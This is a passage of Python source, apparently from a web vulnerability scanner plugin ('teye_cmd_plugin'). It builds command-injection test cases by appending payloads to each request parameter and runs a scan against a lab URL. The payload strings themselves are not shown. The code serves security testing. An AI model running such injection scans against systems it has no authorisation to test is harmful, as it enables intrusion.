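        cmd_db.append(cmd_item)

        return cmd_db

    def _fill_param(self, param):
        '''
        Return a deep copy of *param* in which empty values are replaced by
        smart_fill(key).

        @param:{"a":[1]}
        '''
        param_dict = copy.deepcopy(param)

        for key, value in param_dict.iteritems():
            str_value = "".join(value)
            if str_value == "":
                param_dict[key] = smart_fill(key)

        return param_dict

    def _get_payload_list(self, param):
        '''
        Build the test cases for *param*.

        Returns a list of (parameter name, parameter dict, pattern) tuples.
        In each dict exactly one parameter carries a test string; all others
        keep their original (or smart-filled) value.  Parameters holding more
        than one value are skipped.
        '''
        res = []

        o_param_dict = self._fill_param(param)

        for name in o_param_dict.keys():
            o_v = o_param_dict.get(name)
            if type(o_v) is list:
                if len(o_v) <= 1:
                    o_v = "".join(o_v)
                else:
                    continue

            for item in self._cmd_db:
                pattern = item["pattern"]
                for p in item["payload"]:
                    # Work on a copy: writing into o_param_dict itself left
                    # the last test string in place, so it leaked into the
                    # cases generated for the following parameters.
                    poc_param_dict = copy.deepcopy(o_param_dict)
                    # payload is built as: original value + payload
                    poc_param_dict[name] = o_v + p

                    # complete parameter set, as a dict
                    res.append((name, poc_param_dict, pattern))
        return res

    def get_name(self):
        '''
        Return the plugin name.
        '''
        return "teye_cmd_plugin"


if __name__ == "__main__":
    '''
    '''
    cmd_url = "http://192.168.126.143/book/cmd/1_cmd.php?data=test"
    req = Request(cmd_url)
    t_scanner = cmd()
    t_scanner.check(req)
--------------------------------------------------------------------------------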